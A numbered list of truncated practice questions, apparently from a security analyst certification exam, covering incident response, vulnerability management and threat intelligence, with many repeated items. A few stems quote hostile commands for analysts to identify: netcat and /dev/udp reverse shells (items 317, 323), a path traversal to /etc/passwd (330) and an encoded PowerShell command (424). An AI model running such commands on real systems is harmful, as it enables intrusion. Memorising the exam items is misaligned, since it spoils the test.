  313. Results of a SOC customer service evaluation indicate high levels of dissatisfaction with the inconsistent services provided after regular work hours. To addres ...
  314. A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. ...
  315. Which of the following best describes the key elements of a successful information security program?
  316. Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?
  317. A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$1 Which of the following is being attempted?
  318. A Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to mainta ...
  319. A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attac ...
  320. A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the ...
  321. Several reports with sensitive information are being disclosed via file sharing services. The company would like to improve its security posture against this th ...
  322. A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and ...
  323. A security analyst detected the following suspicious activity: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the foll ...
  324. A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that r ...
  325. Which of the following would an organization use to develop a business continuity plan?
  326. A SOC receives several alerts indicating user accounts are connecting to the company’s identity provider through non-secure communications. User credentials for ...
  327. Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of re ...
  328. A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the followin ...
  329. An analyst investigated a website and produced the following: Which of the following syntaxes did the analyst use to discover the application versions on this v ...
  330. An analyst reviews the following web server log entries: %2E%2E/%2E%2E/%2ES2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd No attacks or malicious attempts have been discove ...
  331. Which of the following can be used to learn more about TTPs used by cybercriminals?
  332. A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the ...
  333. A company's security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptomi ...
  334. A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?
  335. Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure e ...
  336. Which of the following is a nation-state actor least likely to be concerned with?
  337. A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?
  338. Which of the following is a benefit of the Diamond Model of Intrusion Analysis?
  339. A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log source ...
  340. After an upgrade to a new EDR, a security analyst received reports that several endpoints were not communicating with the SaaS provider to receive critical thre ...
  341. A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst c ...
  342. Which of the following ensures that a team receives simulated threats to evaluate incident response performance and coordination?
  343. Which of the following risk management principles is accomplished by purchasing cyber insurance?
  344. A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mi ...
  345. An analyst is reviewing a dashboard from the company's SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events i ...
  346. A cybersecurity analyst has been assigned to the threat-hunting team to create a dynamic detection strategy based on behavioral analysis and attack patterns. Wh ...
  347. Which of the following describes the best reason for conducting a root cause analysis?
  348. Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hou ...
  349. Which of the following characteristics ensures the security of an automated information system is the most effective and economical?
  350. Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?
  351. A security analyst has prepared a vulnerability scan that contains all of the company's functional subnets. During the initial scan, users reported that network ...
  352. An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a r ...
  353. A security analyst wants to implement new monitoring controls in order to find abnormal account activity for traveling employees. Which of the following techniq ...
  354. Which of the following is an important aspect that should be included in the lessons-learned step after an incident?
  355. Which of the following is the most important factor to ensure accurate incident response reporting?
  356. Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events ...
  357. Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events ...
  358. A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: getconnection(database01, "alp ...
  359. An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has allowed the attacker to prioritize possible next targets. Whi ...
  360. Which of the following is the first step that should be performed when establishing a disaster recovery plan?
  361. A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following w ...
  362. A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constrain ...
  363. Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an inciden ...
  364. A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the follo ...
  365. An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running ...
  366. Which of the following makes STIX and OpenIOC information readable by both humans and machines?
  367. The Chief Information Security Officer wants the same level of security to be present whether a remote worker logs in at home or at a coffee shop. Which of the ...
  368. During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the a ...
  369. A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?
  370. During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps sh ...
  371. A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other ti ...
  372. An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any imp ...
  373. The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase th ...
  374. Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the gen ...
  375. Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is aff ...
  376. Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the gen ...
  377. Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is aff ...
  378. An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategies ...
  379. A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiali ...
  380. An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP a ...
  381. Which of following would best mitigate the effects of a new ransomware attack that was not properly stopped by the company antivirus?
  382. An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gat ...
  383. Which of the following is the best way to begin preparation for a report titled 'What We Learned' regarding a recent incident involving a cybersecurity breach?
  384. A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the sp ...
  385. Which of the following is the most appropriate action a security analyst to take to effectively identify the most security risks associated with a locally hoste ...
  386. Which of the following most accurately describes the Cyber Kill Chain methodology?
  387. Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the ...
  388. A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the sc ...
  389. An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from acces ...
  390. A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isol ...
  391. Which of the following is the most important reason for an incident response team to develop a formal incident declaration?
  392. Which of the following best describes the goal of a tabletop exercise?
  393. A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a ...
  394. An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the foll ...
  395. Which of the following is the best reason to implement an MOU?
  396. An employee downloads a freeware program to change the desktop to the classic look of legacy Windows. Shortly after the employee installs the program, a high vo ...
  397. Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective ac ...
  398. A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following command ...
  399. Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the followin ...
  400. The DevSecOps team is remediating a Server-Side Request Forgery (SSRF) issue on the company's public-facing website. Which of the following is the best mitigati ...
  401. A security analyst has found the following suspicious DNS traffic while analyzing a packet capture: • DNS traffic while a tunneling session is active. • The mea ...
  402. Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
  403. Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrenc ...
  404. An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed. Which of the followi ...
  405. A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating syst ...
  406. The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch ...
  407. A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Wh ...
  408. The SOC received a threat intelligence notification indicating that an employee's credentials were found on the dark web. The user's web and log-in activities w ...
  409. A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclos ...
  410. A security analyst runs the following command: # nmap -T4 -F 192.168.30.30 Starting nmap 7.6 Host is up (0.13s latency) PORT STATE SERVICE 23/tcp open telnet 44 ...
  411. Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with ...
  412. An analyst is reviewing a dashboard from the company’s SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events i ...
  413. After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management p ...
  414. The security analyst received the monthly vulnerability report. The following findings were included in the report: • Five of the systems only required a reboot ...
  415. An employee received a phishing email that contained malware targeting the company. Which of the following is the best way for a security analyst to get more de ...
  416. While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the followi ...
  417. Which of the following actions would an analyst most likely perform after an incident has been investigated?
  418. A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions ...
  419. Which of the following would eliminate the need for different passwords for a variety of internal applications?
  420. A list of IOCs released by a government security organization contains the SHA-256 hash for a Microsoft-signed legitimate binary, svchost.exe. Which of the foll ...
  421. A web application has a function to retrieve content from an internal URL. The security analyst wants to identify correctly formatted GET requests to 'https://1 ...
  422. A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The prox ...
  423. An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with ...
  424. An analyst is investigating a phishing incident and has retrieved the following as part of the investigation: cmd.exe /c c:\Windows\System32\WindowsPowerShell\v ...
  425. After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fa ...
  426. A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes ...
  427. During an incident, analysts need to rapidly investigate by the investigation and leadership teams. Which of the following best describes how PII should be safe ...
  428. Which of the following statements best describes the MITRE ATT&CK framework?
  429. Which of the following responsibilities does the legal team have during an incident management event? (Select two).
  430. Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operatin ...
  431. A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
  432. Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a. ...
  433. An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company ...
  434. An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears tha ...
  435. Which of the following is most appropriate to use with SOAR when the security team would like to automate actions across different vendor platforms?
  436. A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on ...
  437. A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a termin ...
  438. Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
  439. An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed ...
  440. An organization discovered a data breach that resulted in PII being released to the public. During the lessons learned review, the panel identified discrepancie ...
  441. A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?
  442. A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MI ...
  443. A security analyst needs to develop a solution to protect a high-value asset from an exploit like a recent zero-day attack. Which of the following best describe ...
  444. The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its ...
  445. Which of the following is the best authentication method to secure access to sensitive data?
  446. While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the ...
  447. An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. ...
  448. A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the ...
  449. During a tabletop exercise, engineers discovered that an ICS could not be updated due to hardware versioning incompatibility. Which of the following is the most ...
  450. A Chief Information Security Officer wants to lock down the users' ability to change applications that are installed on their Windows systems. Which of the foll ...
  451. New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC man ...
  452. An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party tha ...
  453. A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the followin ...
  454. A security analyst needs to provide evidence of regular vulnerability scanning on the company's network for an auditing process. Which of the following is an ex ...
  455. A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notif ...
  456. A systems administrator is reviewing after-hours traffic flows from data center servers and sees regular, outgoing HTTPS connections from one of the servers to ...
  457. There are several reports of sensitive information being disclosed via file-sharing services. The company would like to improve its security posture against thi ...
  458. A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. ...
  459. A company is launching a new application in its internal network, where internal customers can communicate with the service desk. The security team needs to ens ...
  460. Which of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power plant?
  461. A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the ...
  462. Which of the following is the best use of automation in cybersecurity?
  463. Which of the following best explains the importance of communicating with staff regarding the official public communication plan related to incidents impacting ...
  464. Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastruct ...
  465. A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cy ...
  466. An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulne ...
  467. A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when pro ...
  468. The Chief Information Security Officer (CISO) wants the same level of security to be present whether a remote worker logs in at home or at a coffee shop. Which ...
  469. A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst ...
  470. When undertaking a cloud migration of multiple SaaS applications, an organization's system administrator struggled with identity and access management to cloud- ...
  471. Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?
  472. Which of the following risk management decisions should be considered after evaluating all other options?
  473. A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurr ...
  474. A threat hunter seeks to identify new persistence mechanisms installed in an organization's environment. In collecting scheduled tasks from all enterprise works ...
  475. An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the followin ...
  476. An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the followin ...
  477. While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following sho ...
  478. An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action repo ...
  479. An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of ...
  480. Executives at an organization email sensitive financial information to external business partners when negotiating valuable contracts. To ensure the legal valid ...
  481. The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security t ...
  482. Which of the following are process improvements that can be realized by implementing a SOAR solution? (Select two).
  483. A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following sh ...
  484. An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in ...
  485. A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the foll ...
  486. A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to ht.tps://offce365password.acme.co. The si ...
  487. An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is ...
  488. A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to mini ...
  489. A vulnerability scan shows several vulnerabilities. At the same time, a zero-day vulnerability with a CVSS score of 10 has been identified on a web server. Whic ...
  490. When starting an investigation, which of the following must be done first?
  491. A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next st ...
  492. Which of the following will most likely ensure that mission-critical services are available in the event of an incident?
  493. A Chief Information Security Officer wants to implement security by design, starting with identifying vulnerabilities, including SQL injection, RFI, XSS, etc. W ...
  494. A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the followi ...
  495. A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be re ...
  496. During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate t ...
  497. After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too hig ...
  498. After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too hig ...
  499. A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the followi ...
  500. A SOC analyst observes reconnaissance activity from an IP address. The activity follows a pattern of short bursts toward a low number of targets. An open-source ...
  501. Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-whe ...
  502. Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-whe ...
  503. Exploit code for a recently disclosed critical software vulnerability was publicly available (or download for several days before being removed). Which of the f ...
  504. Exploit code for a recently disclosed critical software vulnerability was publicly available (or download for several days before being removed). Which of the f ...
  505. An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the contro ...
  506. Which of the following security operations tasks are ideal for automation?
  507. An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the contro ...
  508. Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?
  509. Which of the following is a commonly used four-component framework to communicate threat actor behavior?
  510. Which of the following tools would work best to prevent the exposure of PII outside of an organization?
  511. A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following s ...
  512. During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related t ...
  513. A security manager reviews the permissions for the approved users of a shared folder and finds accounts that are not on the approved access list. While investig ...
  514. Which of the following is a commonly used four-component framework to communicate threat actor behavior?
  515. Which of the following tools would work best to prevent the exposure of PII outside of an organization?
  516. During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related t ...
  517. An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities: CVSS: 3.1 ...
  518. The management team requests monthly KPI reports on the company's cybersecurity program. Which of the following KPIs would identify how long a security threat g ...
  519. Given the following CVSS string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:K/I:K/A:H. Which of the following attributes correctly describes this vulnerability?
  520. Which of the following does 'federation' most likely refer to within the context of identity and access management?
  521. A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Offi ...
  522. A SOC team lead occasionally collects some DNS information for investigations. The team lead assigns this task to a new junior analyst. Which of the following i ...
  523. An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and t ...
  524. An organization utilizes multiple vendors, each with its own portal that a security analyst must sign in to daily. Which of the following is the best solution f ...
  525. Which of the following tools would work best to prevent the exposure of PII outside of an organization?
  526. An organization utilizes multiple vendors, each with its own portal that a security analyst must sign in to daily. Which of the following is the best solution f ...
  527. A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path tra ...
  528. A systems administrator needs to gather security events with repeatable patterns from Linux log files. Which of the following would the administrator most likel ...
  529. A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is ...
  530. A company has recently experienced a security breach via a public-facing service. Analysis of the event on the server was traced back to the following piece of ...
  531. After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Window ...
  532. A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash sc ...
  533. An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizin ...
  534. Which of the following tools would work best to prevent the exposure of PII outside of an organization?
  535. An organization utilizes multiple vendors, each with its own portal that a security analyst must sign in to daily. Which of the following is the best solution f ...
  536. After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Window ...
  537. The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch ...
  538. A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other ti ...
  539. Which of the following will most likely ensure that mission-critical services are available in the event of an incident?
  540. The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase th ...
  541. An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from acces ...
  542. A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attac ...
  543. An analyst finds that an IP address outside of the company network is being used to run network and vulnerability scans across external-facing assets. Which of ...
  544. During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would be ...
  545. An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a r ...
  546. Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?
  547. A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?
  548. An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the foll ...
  549. An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the ...
  550. Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
  551. A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the followi ...
  552. A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a termin ...
  553. Which of the following is the first step that should be performed when establishing a disaster recovery plan?
  554. A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?
  555. A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. ...
  556. When starting an investigation, which of the following must be done first?
  557. An organization utilizes multiple vendors, each with its own portal that a security analyst must sign in to daily. Which of the following is the best solution f ...
  558. Which of the following tools would work best to prevent the exposure of PII outside of an organization?
  559. Which of the following is a commonly used four-component framework to communicate threat actor behavior?
  560. A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the followin ...
  561. A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up ...
  562. Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
  563. A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of ...
  564. An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the f ...
  565. An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the f ...
  566. There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against thi ...
  567. Which of the following is the best way to begin preparation for a report titled 'What We Learned' regarding a recent incident involving a cybersecurity breach?
  568. A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclos ...
  569. Which of the following would help to minimize human engagement and aid in process improvement in security operations?
  570. Which of the following would help to minimize human engagement and aid in process improvement in security operations?
  571. After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too hig ...
  572. The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best a ...
  573. An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which ...
  574. Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-whe ...
  575. During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate t ...
  576. During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and ...
  577. A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a ...
  578. New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC man ...
  579. An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company ...
  580. An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action repo ...
  581. A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
  582. An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of ...
  583. During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related t ...
  584. A user reports a malware alert to the help desk. A technician verifies the alert, determines the workstation is classified as a low-severity device, and uses ne ...
  585. A development team recently released a new version of a public-facing website for testing prior to production. The development team is soliciting the help of va ...
  586. A security technician is testing a solution that will prevent outside entities from spoofing the company's email domain, which is comptia.org. The testing is su ...
  587. A security analyst who works in the SOC receives a new requirement to monitor for indicators of compromise. Which of the following is the first action the analy ...
  588. A company's threat team has been reviewing recent security incidents and looking for a common theme. The team discovered the incidents were caused by incorrect ...
  589. A product manager is working with an analyst to design a new application that will perform as a data analytics platform and will be accessible via a web browser ...
  590. A security analyst performs a weekly vulnerability scan on a network that has 240 devices and receives a report with 2,450 pages. Which of the following would m ...
  591. An organization wants to move non-essential services into a cloud computing environment. The management team has a cost focus and would like to achieve a recove ...
  592. A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
  593. During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related t ...
  594. A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a ...
  595. Which of the following software assessment methods would be best for gathering data related to an application's availability during peak times?
  596. During an incident response procedure, a security analyst acquired the needed evidence from the hard drive of a compromised machine. Which of the following acti ...
  597. As a proactive threat-hunting technique, hunters must develop situational cases based on likely attack scenarios derived from the available threat intelligence ...
  598. A company creates digitally signed packages for its devices. Which of the following best describes the method by which the security packages are delivered to th ...
  599. As a proactive threat-hunting technique, hunters must develop situational cases based on likely attack scenarios derived from the available threat intelligence ...
  600. A Chief Information Security Officer (CISO) is concerned about new privacy regulations that apply to the company. The CISO has tasked a security analyst with fi ...
  601. A Chief Information Officer wants to implement a BYOD strategy for all company laptops and mobile phones. The Chief Information Security Officer is concerned wi ...
  602. A security analyst discovers the accounting department is hosting an accounts receivable form on a public document service. Anyone with the link can access it. ...
  603. A security analyst is supporting an embedded software team. Which of the following is the best recommendation to ensure proper error handling at runtime?
  604. A cybersecurity analyst is concerned about attacks that use advanced evasion techniques. Which of the following would best mitigate such attacks?
  605. Legacy medical equipment, which contains sensitive data, cannot be patched. Which of the following is the best solution to improve the equipment's security post ...
  606. A company's legal department is concerned that its incident response plan does not cover the countless ways security incidents can occur. The department has ask ...
  607. A security analyst responds to a series of events surrounding sporadic bandwidth consumption from an endpoint device. The security analyst then identifies the f ...
  608. A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
  609. During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related t ...
  610. Which of the following ICS network protocols has no inherent security functions on TCP port 502?
  611. A security engineer is reviewing security products that identify malicious actions by users as part of a company's insider threat program. Which of the followin ...
  612. A security engineer is reviewing security products that identify malicious actions by users as part of a company's insider threat program. Which of the followin ...
  613. Members of the sales team are using email to send sensitive client lists with contact information to their personal accounts. The company's AUP and code of cond ...
  614. While observing several host machines, a security analyst notices a program is overwriting data to a buffer. Which of the following controls will best mitigate ...
  615. An organization announces that all employees will need to work remotely for an extended period of time. All employees will be provided with a laptop and support ...
  616. The management team has asked a senior security engineer to explore DLP security solutions for the company's growing use of cloud-based storage. Which of the fo ...
  617. The management team has asked a senior security engineer to explore DLP security solutions for the company's growing use of cloud-based storage. Which of the fo ...
  618. Which of the following is the greatest security concern regarding ICS?
  619. An organization implemented an extensive firewall access-control blocklist to prevent internal network ranges from communicating with a list of IP addresses of ...
  620. Which of the following describes the difference between intentional and unintentional insider threats?
  621. An organization wants to consolidate a number of security technologies throughout the organization and standardize a workflow for identifying security issues pr ...
  622. A new prototype for a company's flagship product was leaked on the internet. As a result, the management team has locked out all USB drives. Optical drive write ...
  623. An organization wants to consolidate a number of security technologies throughout the organization and standardize a workflow for identifying security issues pr ...
  624. The management team has asked a senior security engineer to explore DLP security solutions for the company's growing use of cloud-based storage. Which of the fo ...
  625. A risk assessment concludes that the perimeter network has the highest potential for compromise by an attacker, and it is labeled as a critical risk environment ...
  626. A company is aiming to test a new incident response plan. The management team has made it clear that the initial test should have no impact on the environment. ...
  627. Which of the following is the best reason why organizations need operational security controls?
